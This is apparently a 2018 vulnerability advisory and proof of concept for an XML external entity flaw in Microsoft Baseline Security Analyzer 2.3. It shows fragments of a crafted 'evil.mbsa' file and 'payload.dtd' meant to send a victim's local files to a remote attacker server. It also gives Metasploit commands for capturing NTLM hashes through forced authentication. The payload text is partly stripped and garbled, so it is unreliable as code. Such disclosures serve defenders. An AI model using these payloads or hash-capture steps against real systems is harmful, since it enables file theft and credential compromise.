# Title: Microsoft Baseline Security Analyzer 2.3 - XML External Entity Injection # Date: 2018-09-08 # Author: John Page (aka hyp3rlinx) # Vendor: Microsoft # Software link: https://www.microsoft.com/en-us/download/details.aspx?id=7558 # Software Version: 2.3 # References: ZDI-CAN-6307 # References: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-BASELINE-ANALYZER-v2.3-XML-INJECTION.txt # References: hyp3rlinx.altervista.org # Security Issue # Microsoft Baseline Security Analyzer allows local files to be exfiltrated to a remote attacker # controlled server if a user opens a specially crafted ".mbsa" file. # Exploit/POC # Install MBSA # https://www.microsoft.com/en-us/download/details.aspx?id=7558 # 1) "evil.mbsa" %dtd;]> &send; # 2) "payload.dtd" "> %all; # When victim attempts open file they get prompted "Do you want to let this app # make changes to your device?" However, it also indicates it is a "verified publisher" namely Microsoft. # After opening the local users files can be exfiltrated to a remote server. # Moreover, we can use this to steal NTLM hashes. # Using Forced Authentication to steal NTLM hashes # 2) msf > use auxiliary/server/capture/smb # msf auxiliary(smb) > exploit -j "evil.mbsa" %dtd;]> # Result: credentials captured by remote sever